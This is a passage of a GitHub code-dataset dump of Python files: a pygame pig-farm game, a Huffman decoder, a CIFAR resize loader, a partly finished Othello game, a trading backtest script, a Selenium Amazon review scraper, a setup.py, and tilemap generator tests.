pygame.key.get_pressed()[pygame.K_p]:\n if paused:\n logger.info('PAUSED@'+str(time.asctime()))\n else:\n logger.info('UNPAUSED@'+str(time.asctime()))\n paused = not paused\n elif pygame.key.get_pressed()[pygame.K_ESCAPE]:\n terminate(pig)\n\n if not paused:\n if pig.weight >= 30 and int(time.time())%WOLFDELAY == 0:\n for w in wolfGroup:\n if not w.engaged:\n if random.randint(10,30) == w.engageDelay:\n w.engaged = True\n pig.updateSelf()\n pig.moveSelf()\n #Wolf collision\n for w in wolfGroup:\n \n if w.engaged:\n w.moveSelf(pig)\n if isinstance(pygame.sprite.collide_mask(w,pig),tuple):\n if int(time.time()) % w.damageDelay == 0:\n errorPlace = 0 \n for index,i in enumerate(w.attackSprites):\n if w.sCount + index >= len(w.spriteList):\n errorPlace = w.sCount + index\n w.spriteList[(w.sCount + index)-errorPlace] = i\n pig.health -= w.damage\n w.damageDelay = random.randrange(1,10)\n if pig.health < 0:\n roundOver=True\n pig,gameOver,systemData = midRound(pig,systemData)\n #Butcher shop collision\n if isinstance(pygame.sprite.collide_mask(pig,systemData.butcherShop),tuple):\n pig,gameOver,systemData = midRound(pig,systemData)\n roundOver = True\n #Food colision \n for food in FoodGroup: \n if isinstance(pygame.sprite.collide_mask(food,pig),tuple):\n pig.health += food.healthGain\n pig.weight += food.weightGain\n pig.size += food.weightGain\n pig.h += 1\n pig.w += 1\n pig.highStamina += food.staminaGain\n pig.highHealth += food.weightGain/2\n if pig.health > pig.highHealth:\n pig.health = pig.highHealth\n if pig.highHealth > pig.MAXHEALTH:\n pig.highHealth = pig.MAXHEALTH\n pig.healthColor = ORANGE\n if pig.weight >= pig.MAXWEIGHT:\n pig.weight = pig.MAXWEIGHT\n pig.weightColor = ORANGE\n if pig.size > pig.MAXSIZE:\n pig.size = pig.MAXSIZE\n if pig.highStamina >= pig.MAXSTAMINA:\n pig.highStamina = pig.MAXSTAMINA\n pig.speedColor = ORANGE\n if pig.speed > pig.minSpeed:\n pig.speed -= pig.speedLoss\n elif pig.speed == pig.minSpeed:\n pig.stamina += pig.staminaGain\n FoodGroup.remove(food)\n if roundOver:\n if gameOver:\n return\n else:\n pig.continueRound()\n FoodGroup.empty()\n wolfGroup.empty()\n roundOver = False\n\ndef researchScreen(systemData):\n xGap=30\n yGap=50\n color = CYAN\n maxUpgrades = 5\n upgradeSize = 10\n upgradeColorLocked = DARKGRAY\n upgradeColorUnLocked = ORANGE\n upgradeColorPurchased = GREEN\n\n statList=readFile('data/stats.txt')\n priceList=readFile('data/prices.txt')\n textList = [TEXT(text='RESEARCH',color=ORANGE,size=FONTSIZE*2,x=SCREENWIDTH/2,y=SCREENHEIGHT/12)]\n optionList = ['Starting Health','Starting Speed','Starting Weight','Max Stamina','Minimum Speed'] #Needs to be in the order of the stats.txt file\n for i in optionList:\n if i == optionList[0]:\n textList.append(TEXT(text=i,color=color,size=FONTSIZE,leftcords={'x':xGap,'y':SCREENHEIGHT/6}))\n else:\n textList.append(TEXT(text=i,color=color,size=FONTSIZE,leftcords={'x':xGap,'y':textList[-1].rect.bottom+yGap}))\n\n for index,i in enumerate(priceList):\n if i.startswith('PIG'):\n if int(statList[i]) == 0:\n temp = int(list(priceList.values())[index])\n else:\n temp = int(statList[i]) * int(list(priceList.values())[index])\n\n if temp == int(list(priceList.values())[0]):\n textList.append(TEXT(text=(str(temp)+'$'),color=color,size=FONTSIZE,rightcords={'x':SCREENWIDTH-xGap,'y':textList[1].rect.top}))\n else:\n textList.append(TEXT(text=(str(temp)+'$'),color=color,size=FONTSIZE,rightcords={'x':SCREENWIDTH-xGap,'y':textList[-1].rect.bottom+yGap})) \n\n textList.append(TEXT(text=('DOUGH IN WALLET: '+str(round(systemData.cash,2))+'$'),color = CYAN,size=FONTSIZE,x=SCREENWIDTH/2,y=textList[-1].rect.bottom+ yGap*2))\n textList.append(TEXT(text='',color=CYAN,size=FONTSIZE,x=SCREENWIDTH/2,y=textList[-1].rect.bottom+yGap))\n\n selectedOption = 0\n while True:\n systemData.draw('night')\n for i in textList:\n i.drawSelf()\n\n circleCenterX = textList[0].rect.right+xGap\n circleCenterY = textList[0].rect.centery\n\n for index,i in enumerate(statList):\n placement = 0\n if textList[index+1].text.find('$')==-1:\n circleCenterX = textList[index+1].rect.right+xGap\n circleCenterY = textList[index+1].rect.centery\n while placement < maxUpgrades:\n upCount = int(statList[i])\n if placement < upCount:\n color = upgradeColorPurchased\n elif placement == upCount:\n if index == selectedOption:\n color = WHITE\n else:\n color = upgradeColorUnLocked\n elif placement > upCount:\n color = upgradeColorLocked\n pygame.draw.circle(GAMESCREEN,color,(circleCenterX,circleCenterY),upgradeSize)\n placement+=1\n circleCenterX += xGap\n circleCenterY += yGap\n\n pygame.display.flip()\n\n for i in pygame.event.get():\n if i.type == QUIT:\n terminate()\n elif i.type == KEYDOWN:\n if i.key == K_ESCAPE:\n writeFile(statList,'data/stats.txt')\n return\n elif i.key == K_TAB or i.key == K_DOWN or i.key == K_s:\n selectedOption += 1\n if selectedOption >= len(optionList):\n selectedOption = 0\n elif i.key == K_w or i.key == K_UP:\n selectedOption -= 1\n if selectedOption < 0:\n selectedOption = len(optionList)-1\n\n#Main while loop:\nwhile True:\n #Game only breaks by using the terminate() function\n logger.info('Pig initlialized, entering the starting screen')\n systemData = SYSTEM()\n startScreen(systemData)","repo_name":"Woldorf/Pig-farm","sub_path":"Runner.py","file_name":"Runner.py","file_ext":"py","file_size_in_byte":23562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"4433472079","text":"import bitstring\nfrom character import Character\nimport pickle\n\nwhile True:\n folder = input('What folder would you like to uncompress? ')\n\n try:\n name = folder.split('_')[0]\n with open(f'{folder}/{name}COMPRESSED_BIN.bnr', 'rb') as f:\n # opening binary\n file_contents = f.read()\n bits = bitstring.Bits(bytes=file_contents)\n bintext = bits.bin\n\n with open(f'{folder}/{name}TREE.obj', 'rb') as f:\n tree = pickle.load(f)\n\n break\n except FileNotFoundError as e:\n print(f'The given folder couldn\\'t be found (ERROR: {e})')\n\nroot = tree.root\n\nprint(root)\ndecodedString = ''\ncur1sAnd0s = [*bintext]\ncounter = 0\ncurNode = root\nwhile len(cur1sAnd0s) > 1:\n if type(curNode) == Character:\n if curNode.character == 'END':\n break\n decodedString += curNode.character\n curNode = root\n cur1sAnd0s = cur1sAnd0s[counter:]\n counter = 0\n else:\n if cur1sAnd0s[counter] == '0':\n curNode = curNode.left\n elif cur1sAnd0s[counter] == '1':\n curNode = curNode.right\n counter += 1\n\nprint(decodedString)\n","repo_name":"ihmnelson/HuffmanCompressor","sub_path":"decodeBetter.py","file_name":"decodeBetter.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"23512098024","text":"from survae.data.loaders import CIFAR10SURVAE\r\nfrom torchvision.transforms.functional import resize\r\nfrom PIL import Image\r\n\r\nstr2interpolation = {\r\n\t'nearest' : Image.NEAREST,\r\n\t'lanczos' : Image.LANCZOS,\r\n\t'bilinear' : Image.BILINEAR,\r\n\t'bicubic' : Image.BICUBIC,\r\n\t'box' : Image.BOX,\r\n\t'hamming' : Image.HAMMING,\r\n}\r\n\r\nclass Resize():\r\n\r\n def __init__(self, size=(32, 32), interpolation='nearest'):\r\n self.size = size\r\n self.interpolation = str2interpolation.get(interpolation, None)\r\n\r\n if self.interpolation is None:\r\n \traise ValueError('Interpolation mode not recognized. Use one of these options: \\'nearest\\', \\'lanczos\\', \\'bilinear\\', \\'bicubic\\', \\'box\\', \\'hamming\\'')\r\n\r\n def __call__(self, image):\r\n return resize(image, size=self.size, interpolation=self.interpolation)\r\n\r\n\r\ndef CIFAR10_resized(size=(32, 32), interpolation='bicubic', train_pil_transforms=[]):\r\n\tcifar = CIFAR10SURVAE(pil_transforms=[Resize(size=size, interpolation=interpolation)], train_pil_transforms=train_pil_transforms)\r\n\treturn cifar\r\n","repo_name":"shayan-kousha/SurVAE","sub_path":"survae/data/loaders/cifar10_downsampled.py","file_name":"cifar10_downsampled.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"7326343980","text":"import numpy as np\n\n#Class created by Jalen Jackson\nclass Stone:\n def __init__(self, row, col, state):\n self.state = state\n self.row = row\n self.col = col\n\n\t#Initalize as a dictionary\n self.neighbors = {}\n\n #Prints the type of stone\n def __repr__(self):\n return str(self.state)\n\n#Class created by Jalen Jackson\nclass Board:\n\n #Initializes the board with two black and two white stones on the middle of the board with size N\n def __init__(self, size):\n self.size = size\n self.stones = [[None] * size for i in range(0, size)]\n \n for j in range(size):\n for i in range(size):\n self.insert(Stone(i, j, '-'))\n\n middleLeft = int((self.size / 2) - 1)\n middleRight = int(self.size / 2)\n\n blackStoneOne = Stone(middleLeft, middleLeft, 'B')\n blackStoneTwo = Stone(middleRight, middleRight, 'B')\n self.insert(blackStoneOne)\n self.insert(blackStoneTwo)\n\n whiteStoneOne = Stone(middleLeft, middleRight, 'W')\n whiteStoneTwo = Stone(middleRight, middleLeft, 'W')\n self.insert(whiteStoneOne)\n self.insert(whiteStoneTwo)\n \n #Inserts the stone on the board at a specific row & column set in the stone's constructor\n def insert(self, stone):\n self.stones[stone.row][stone.col] = stone\n\n #Gets the stone at the row and column specified in the function\n def get_stone_at(self, row, col):\n return self.stones[int(row)][int(col)]\n\n #Returns a dictionary of stones adjacent to the stone specified in the paramter.\n #Key: Returns the direction between the stone and the neighbor\n #Value: Returns the neighbor\n #Felicia NORTH AND SOUTH MIXED\n def neighbors_of(self, stone):\n if stone.row - 1 >= 0:\n stone.neighbors.update({\"SOUTH\" : self.stones[stone.row - 1][stone.col]})\n\n if stone.row + 1 < self.size:\n stone.neighbors.update({\"NORTH\" : self.stones[stone.row + 1][stone.col]})\n\n if stone.col - 1 >= 0:\n stone.neighbors.update({\"WEST\" : self.stones[stone.row][stone.col - 1]})\n\n if stone.col + 1 < self.size:\n stone.neighbors.update({\"EAST\" : self.stones[stone.row][stone.col + 1]})\n\n if stone.row - 1 >= 0 and stone.col - 1 >= 0:\n stone.neighbors.update({\"SOUTHWEST\" : self.stones[stone.row - 1][stone.col - 1]})\n\n if stone.row - 1 >= 0 and stone.col + 1 < self.size:\n stone.neighbors.update({\"SOUTHEAST\" : self.stones[stone.row - 1][stone.col + 1]})\n\n if stone.row + 1 < self.size and stone.col - 1 >= 0:\n stone.neighbors.update({\"NORTHWEST\" : self.stones[stone.row + 1][stone.col - 1]})\n\n if stone.row + 1 < self.size and stone.col + 1 < self.size:\n stone.neighbors.update({\"NORTHEAST\" : self.stones[stone.row + 1][stone.col + 1]})\n \n return stone.neighbors\n\n #Prints the board \n def __repr__(self):\n board = \"\\n\\t Column\\nRow\\t\"\n r = 0\n \n for c in range(0, self.size):\n board += str(c) + \" \"\n board += \"\\n\"\n \n for col in np.array(self.stones):\n board += str(r) + \"\\t\"\n for stone in col:\n board += str(stone) + \" \"\n board += \"\\n\"\n r += 1\n return board\n#Created By Felicia based on algorithm psuedocode\n#Input: stone object, int depth, bool maxPlayer\n#Output: hueristic value assignments to legal moves for current play\ndef mini_max(board, piece, depth, maxPlayer):\n if maxPlayer == False:\n moves = legal_moves(board, 'B')\n else:\n moves = legal_moves(board, 'W')\n \n if depth == 0 or moves == None:\n return set_hueristic_value(piece)\n elif maxPlayer:\n value = -10000\n for i in moves:\n tempVal = mini_max(board, i, depth-1, False)\n if value < tempVal:\n value = tempVal\n return value\n else: #minPlayer\n value = 65\n for i in moves:\n tempVal = mini_max(board, i, depth-1, True)\n if value < tempVal:\n value = tempVal\n return value\n\n\n\n\ndef get_user_postion():\n row = input(\"Please Enter a row: \")\n col = input(\"Please Enter a column: \")\n return row, col\n\n#created by Felicia\ndef legal_moves(board, player):\n movesList = []\n opPosition = []\n endList = []\n size = 6\n if player == 'W':\n oppPlayer ='B'\n else:\n oppPlayer = 'W'\n #get a list of all of the opponents pieces\n for i in range(size):\n for j in range(size):\n stone = board.get_stone_at(i, j)\n if stone.state == oppPlayer:\n opPosition.append(stone)\n #i is a tile with an opponents stone\n for i in opPosition:\n #a list of every direction \n for pieceDir, pieceVal in i.neighbors.items():\n #indicates empty space next to opponents piece \n if pieceVal.state == '-':\n #search for flank\n #set our current piece in position\n d, row, col = get_direction(pieceDir, i.row,i.col)\n temp = board.get_stone_at(row, col)\n \n if temp.state != '-':\n while temp.state == oppPlayer and temp.row < size and temp.col < size:\n d, row, col = get_direction(pieceDir, temp.row,temp.col)\n temp = board.get_stone_at(row, col)\n if temp.state == player:\n #appends the original move as valid\n movesList.append(pieceVal)\n #appends the ending position for flipping of pieces later\n endList.append(temp)\n\n return movesList, endList\n\n#created by Felicia Helper Function for legal_moves\ndef get_direction(direction, row, col):\n headTo = \"\"\n if direction == 'SOUTHEAST':\n headTo = 'NORTHWEST'\n row = row + 1\n col = col - 1\n elif direction == 'NORTHWEST':\n headTo = 'SOUTHEAST'\n row = row - 1\n col = col + 1\n elif direction == 'NORTH':\n headTo = 'SOUTH'\n row = row - 1\n elif direction == 'SOUTH':\n headTo = 'NORTH'\n row = row + 1\n elif direction == 'EAST':\n headTo = 'WEST'\n col = col - 1\n elif direction == 'WEST':\n headTo = 'EAST'\n col = col + 1\n elif direction == 'NORTHEAST':\n headTo = 'SOUTHWEST'\n row = row - 1\n col = col - 1\n elif direction == 'SOUTHWEST':\n headTo = 'NORTHEAST'\n row = row + 1\n col = col + 1\n return headTo, row, col\n\n#Created By James\n#Function that places a stone\ndef place_stone(row, col, board, player):\n newStone = Stone(row, col, player)\n board.insert(newStone)\n\n#Created By James\n#Function that converts a row\n#TODO: make it work for diagonals\ndef convert_line(begRow, begCol, endRow, endCol, board, player):\n if begRow is endRow:\n num = begRow + 1\n while (num != endCol):\n newStone = Stone(begRow, num, player)\n board.insert(newStone)\n num += 1\n if begCol is endCol:\n num = begCol + 1\n while (num != endRow):\n newStone = Stone(num, begCol, player)\n board.insert(newStone)\n num += 1\n\n#TODO\ndef check_for_win(board):\n pass\n#TODO\ndef apply_move(currentStone, board):\n pass\n#TODO\ndef set_hueristic_value(currentStone):\n return 1\n#TODO\ndef get_winner(board):\n pass\n#TODO \ndef pick_best_move(moves):\n return 0,0\n#TODO a function to determine who goes 1st \n#now - human is always black and comp is white <- hardcoded in for testing ATM\n\n#Created By Felicia\n#input: None\n#Controls the game flow\ndef play_game():\n size = 6\n board = Board(size)\n for i in range(size):\n for j in range(size):\n board.neighbors_of(board.get_stone_at(i,j))\n gameInPlay = True\n #assume Player1 is Human and moving 'B' the blackstones\n player1 = False\n passedTurn = False\n \n while gameInPlay:\n print(board)\n moves = []\n #endpieces is a list of pieces that correspond with legal_moves may not need\n endpieces = []\n #players turn\n if player1 == True:\n moves, endpieces = legal_moves(board, 'B')\n #no legal moves means player forfeits turn\n if not moves:\n player1 = False\n #if the opposing player was unable to make a move the game is over\n if passedTurn == True:\n break\n else:\n passedTurn = True\n\t#otherwise get input from player\n else:\n position = False\n passedTurn = False\n while position == False:\n row,col = get_user_postion() #return x,y\n \n if int(row) < size and int(col) < size: #if it's valid\n playerMove = board.get_stone_at(row, col) \n if playerMove in moves: #if it's a legal move\n\t\t#this is function will flip over pieces, playerMove is the piece placed and in the list endpieces a corresponding tile\n\t\t# to the list moves will tell you have far to flip \n apply_move(playerMove, board) #set move on board\n position = True #next turn\n player1 = False\n if check_for_win(board) == False:\n gameInPlay = False\n #The Computers turn \n else:\n moves, endpieces = legal_moves(board, 'W')\n if not moves:\n if passedTurn == True:\n break\n else:\n passedTurn = True\n player1 = True\n else:\n passedTurn = False\n #asign hueristics\n for i in moves:\n mini_max(board, i, 3, True)\n #pick the highest value\n moveRow, moveCol = pick_best_move(moves)\n #TODO need to validate move \n compMove = board.get_stone_at(moveRow, moveCol)\n apply_move(compMove, board)\n player1 = True\n if check_for_win(board) == False:\n gameInPlay = False\n get_winner(board) \n \n\n\nif __name__ == \"__main__\":\n play_game()\n","repo_name":"rhedayat2/Project-Ominite1","sub_path":"Othello.py","file_name":"Othello.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"17109101879","text":"import argparse\nimport Dyn_EE\nfrom datetime import date, timedelta\n\nparser = argparse.ArgumentParser()\nparser.add_argument('spread_name')\nparser.add_argument('threshold', type=int)\nargs = parser.parse_args()\n\ndef test_run():\n\tspread_name = args.spread_name\n\tthreshold = args.threshold\n\n\tend_date = date.today()\n\tstart_date = end_date - timedelta(days=60)\n\ttest_obj = Dyn_EE.Dyn_EE(spread_name, 'data/data_2018', 2.0, 0.5, threshold)\n\ttest_obj.print_SharpeRatio(start_date, end_date)\n\ttest_obj.plot_trade(start_date, end_date)\n\n\n\nif __name__ == '__main__':\n\ttest_run()","repo_name":"twangcode/simpleMA","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"38795685501","text":"import selenium\nfrom selenium import webdriver\nfrom selenium.common.exceptions import *\nimport pymongo,datetime\nimport re\nfrom pymongo import MongoClient\nfrom log_controller import *\nlog_info(\"Selecting collection\")\n\n#connect to database\nclient = MongoClient('localhost',27017)\n#set the db object to pricetracker database\ndb = client['pricetracker']\n#set the db to TV collection\ncollection = db['amznsoundbar']\n#calling the webdriver\ndriver = webdriver.Chrome()\n#initializing different db\n#conn = MongoClient('10.56.133.12',27017)\ndb1 = client['amazon']\ncol = db1['sbreview']\ndt = datetime.datetime.now().date()\n#inserting the values into db\ndef inser(bar,model,noofreview,reviews):\n\t#doc1 = ({'brand':bar,'model':model,str(dt):{'noofreview':noofreview,'reviews':reviews}})\n\t#col.insert_one(doc1)\n\tdb1.sbreview.update_one({'brand':bar,'model':model},{\"$set\": {str(dt):{'noofreview':noofreview,'reviews':reviews}}},upsert = True)\n\tprint(\"Insert Complete\")\n#defining main function\ndef main():\n\tfor doc in collection.find({}):\n\t\t# storing the url\n\t\tresult = doc['url']\n\t\t#storing the brandname\n\t\tbar = doc['brand']\n\t\t#storing the model name\n\t\tmodel = doc['model']\n\t\tif( len(result) == 0):\n\t\t\tprint(\"NO DATA\")\n\t\telse:\n\t\t\tdriver.get(result)\n\t\t\tasin = str((driver.find_element_by_xpath('//*[@id=\"prodDetails\"]/div/div[2]/div[1]/div[2]/div/div/table/tbody/tr[1]/td[2]')).text)\n\t\t\tfor p_no in range(1,9):\n\t\t\t\tdriver.get('https://www.amazon.in/product-reviews/'+asin+'/ref=cm_cr_getr_d_paging_btm_'+str(p_no)+'?ie=UTF8&reviewerType=all_reviews&pageNumber='+str(p_no)+'')\n\t\t\t\tnoofreview = str(driver.find_element_by_xpath('//*[@id=\"cm_cr-product_info\"]/div/div[1]/div[2]/div/div/div[2]/div/span').text)\n\t\t\t\tprint(noofreview)\n\t\t\t\ttry:\n\t\t\t\t\t#rn = str(driver.find_element_by_xpath('//a[@data-hook=\"profile-name\"]').text)\n\t\t\t\t\trt = str(driver.find_element_by_xpath('//a[@data-hook=\"review-title\"]').text)\n\t\t\t\t\trd = str(driver.find_element_by_xpath('//span[@data-hook=\"review-date\"]').text)\n\t\t\t\t\trb = str(driver.find_element_by_xpath('//span[@data-hook=\"review-body\"]').text)\n\t\t\t\t\tfor r in rt,rd,rb:\n\t\t\t\t\t\treviews = r\n\t\t\t\t\t\tprint(reviews)\n\t\t\t\t\t\tinser(bar,model,noofreview,reviews)\t\n\t\t\t\texcept:\n\t\t\t\t\tprint(\"No more reviews\")\n\t\t\t\t\tbreak\n\t\t\t\t\t\t\nif __name__ == '__main__':\n\tmain()\ndriver.quit()\nprint(\"Completed\")","repo_name":"Saurav2304/automation","sub_path":"amazon-sdreview.py","file_name":"amazon-sdreview.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25625781659","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nfrom src.ellipsize import version\n\nsetuptools.setup(\n name=\"ellipsize\",\n version=version.VERSION,\n author=\"Andrey Sorokin\",\n author_email=\"andrey@sorokin.engineer\",\n description=\"Pretty reducing huge Python objects to visualise them nicely.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://andgineer.github.io/ellipsize/\",\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires=\">=3.7\",\n keywords=\"ellipsis log print\",\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"andgineer/ellipsize","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6071999597","text":"from tilemap_generator import TileMap, Island, Biom\nimport numpy as np\nimport pytest\n\nfrom errors import InvalidMapDimensionsError, InvalidPercentError\nfrom errors import InvalidIslandSurfaceError, InvalidIslandAreaError\nfrom errors import InvalidBiomAreaError, InvalidBiomNameError\nfrom errors import InvalidBiomPatternNameError, InvalidRgbError\n\n\ndef test_create_map():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n assert mapa.map.shape == (40, 40, 3)\n assert mapa.rows == 40\n assert mapa.columns == 40\n assert mapa.final_surface == 256\n assert mapa.biom_patterns == {\n 'snow': [255, 255, 255],\n 'desert': [250, 214, 107],\n 'jungle': [22, 71, 11]}\n assert mapa.islands == []\n\n\ndef test_change_island_and_water_colour():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.island_rgb = ([22, 123, 45])\n mapa.water_rgb = ([34, 124, 200])\n assert mapa.water_rgb == [34, 124, 200]\n assert mapa.island_rgb == [22, 123, 45]\n\n\ndef test_add_biom_patterns():\n mapa = TileMap(40, 40, 40)\n assert len(mapa.biom_patterns) == 3\n mapa.add_biom_pattern('bagno', [11, 11, 11])\n assert len(mapa.biom_patterns) == 4\n assert mapa.biom_patterns['bagno'] == [11, 11, 11]\n\n\ndef test_first_tile(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def get_tile(t, f):\n return 5\n monkeypatch.setattr('tilemap_generator.randint', get_tile)\n first_tile = mapa.first_tile()\n assert first_tile == (5, 5)\n assert all(c_code in mapa.water_rgb for c_code in mapa.map[(first_tile)])\n\n\ndef test_calculate_close_neighbours():\n mapa = TileMap(40, 40, 40)\n tiles = [(4, 5), (6, 5), (5, 4), (5, 6)]\n assert mapa.calculate_close_neighbours((5, 5)) == tiles\n\n\ndef test_calculate_extended_neighbours():\n mapa = TileMap(40, 40, 40)\n tiles = [(4, 4), (4, 6), (6, 4), (6, 6)]\n assert mapa.calculate_extended_neighbours((5, 5)) == tiles\n\n\ndef test_split_surface_if_surface_is_correct():\n mapa = TileMap(40, 40, 40)\n mapa.min_island_surface = 20\n islands = mapa.split_surface_beetwen_islands()\n total_surface = sum(list(islands.values()))\n assert len(islands) > 0\n assert total_surface == mapa.final_surface\n for island in islands:\n assert islands[island] >= 20\n\n\ndef test_split_surface_min_island_surface_greater_than_total():\n mapa = TileMap(40, 40, 40)\n mapa.min_island_surface = 10000\n islands = mapa.split_surface_beetwen_islands()\n total_surface = sum(list(islands.values()))\n assert len(islands) == 1\n assert total_surface == mapa.final_surface == 256\n\n\ndef test_apply_island_on_map(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n mapa.apply_islands_on_map()\n assert len(mapa.islands) == 4\n assert mapa.islands[0].surface == 175\n assert mapa.islands[1].surface == 8\n assert mapa.islands[2].surface == 56\n assert mapa.islands[3].surface == 17\n\n f = None\n for island in mapa.islands:\n assert island.surface == surfaces(f)[island.index]\n assert island.surface == len(set(island.area))\n rgb = mapa.island_rgb\n for tile in island.area:\n assert all(c_code in rgb for c_code in mapa.map[(tile)])\n\n\ndef test_create_land_correct_colour_code():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n area = mapa.create_land(123, (20, 20))\n assert len(area) == 123\n assert (20, 20) in area\n for tile in area:\n assert all(c_code in mapa.island_rgb for c_code in mapa.map[(tile)])\n\n\ndef test_useless_tile_True():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.map[7, 7] = np.array([10, 138, 22]) # island, central tile\n mapa.map[6, 7] = np.array([10, 138, 22]) # island, up\n mapa.map[8, 7] = np.array([10, 138, 22]) # island, down\n mapa.map[7, 6] = np.array([10, 138, 22]) # island, left\n mapa.map[7, 8] = np.array([10, 138, 22]) # island, right\n assert mapa.useless_tile((7, 7)) is True\n\n\ndef test_useless_tile_False():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.map[7, 7] = np.array([10, 138, 22]) # island, central tile\n mapa.map[6, 7] = np.array([10, 138, 22]) # island, up\n mapa.map[8, 7] = np.array([10, 138, 22]) # island, down\n mapa.map[7, 6] = np.array([10, 138, 22]) # island, left\n mapa.map[7, 8] = np.array([10, 65, 148]) # island, right\n assert mapa.useless_tile((7, 7)) is False\n\n\ndef test_separate_islands(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n island_1 = Island(1, [(20, 20)], 1, 20, 50)\n mapa.islands.append(island_1)\n\n assert mapa.separate_islands((19, 19)) is False\n assert mapa.separate_islands((19, 20)) is False\n assert mapa.separate_islands((19, 21)) is False\n assert mapa.separate_islands((20, 19)) is False\n assert mapa.separate_islands((20, 21)) is False\n assert mapa.separate_islands((21, 19)) is False\n assert mapa.separate_islands((21, 20)) is False\n assert mapa.separate_islands((21, 21)) is False\n\n\ndef test_get_island_by_index():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n for island in mapa.islands:\n assert island.area == mapa.get_island_by_index(island.index).area\n\n\ndef test_delete_island(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n mapa.apply_islands_on_map()\n for island in mapa.islands:\n island_area = island.area\n mapa.delete_island(island)\n for tile in island_area:\n assert all(c_code in mapa.water_rgb for c_code in mapa.map[(tile)])\n\n\ndef test_restore_island():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n island = mapa.islands[0]\n for tile in island.area:\n mapa.map[tile] = np.array([255, 5, 5])\n assert all(c_code in [255, 5, 5] for c_code in mapa.map[tile])\n mapa.restore_island(island)\n for tile in island.area:\n assert not any(c_code in [255, 5, 5] for c_code in mapa.map[tile])\n\n\ndef test_apply_biom(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n\n def my_choice():\n return 0.5\n monkeypatch.setattr('tilemap_generator.random', my_choice)\n\n mapa.apply_islands_on_map()\n mapa.apply_biom()\n assert len(mapa.get_island_by_index(1).bioms) == 1\n assert len(mapa.get_island_by_index(2).bioms) == 0\n assert len(mapa.get_island_by_index(3).bioms) == 1\n assert len(mapa.get_island_by_index(4).bioms) == 1\n\n for island in mapa.islands:\n for biom in island.bioms:\n for tile in biom.area:\n assert all(c_code in biom.c_code for c_code in mapa.map[tile])\n assert tile in island.area\n assert len(biom.area) == len(set(biom.area))\n assert len(biom.area) == int(island.surface * 0.5)\n\n\ndef test_create_biom_correct_colour_code():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n island = mapa.islands[0]\n first_tile = island.area[0]\n mapa.create_biom(20, first_tile, [123, 45, 22])\n biom_surface = 0\n for tile in island.area:\n if all(c_code in [123, 45, 22] for c_code in mapa.map[tile]):\n biom_surface += 1\n assert biom_surface == 20\n\n\ndef test_delete_biom(monkeypatch):\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n\n def surfaces(f):\n return {1: 175, 2: 8, 3: 56, 4: 17}\n monkeypatch.setattr('tilemap_generator.TileMap.split_surface_beetwen_islands', surfaces)\n\n mapa.apply_islands_on_map()\n mapa.apply_biom()\n assert len(mapa.get_island_by_index(1).bioms) == 1\n assert len(mapa.get_island_by_index(2).bioms) == 0\n assert len(mapa.get_island_by_index(3).bioms) == 1\n assert len(mapa.get_island_by_index(4).bioms) == 1\n\n for island in mapa.islands:\n mapa.delete_biom(island)\n assert len(island.bioms) == 0\n for tile in island.area:\n assert all(c_code in mapa.island_rgb for c_code in mapa.map[tile])\n\n\ndef test_str():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n mapa.apply_islands_on_map()\n text = f'{\"TileMap: 1600 tiles\"}\\n'\n text += f'{\"Total islands surface: 256 tiles\"}'\n assert str(mapa) == text\n\n\ndef test_return_image():\n mapa = TileMap(40, 40, 40)\n mapa.initialize_map()\n assert type(mapa.return_image()) == bytes\n\n\ndef test_Island_create():\n island = Island(2, [(20, 10), (21, 10)], 1, 0.2, 1)\n assert island.surface == 2\n assert island.area == [(20, 10), (21, 10)]\n assert island.index == 1\n assert island.bioms == []\n assert island.percent_map == 0.2 * 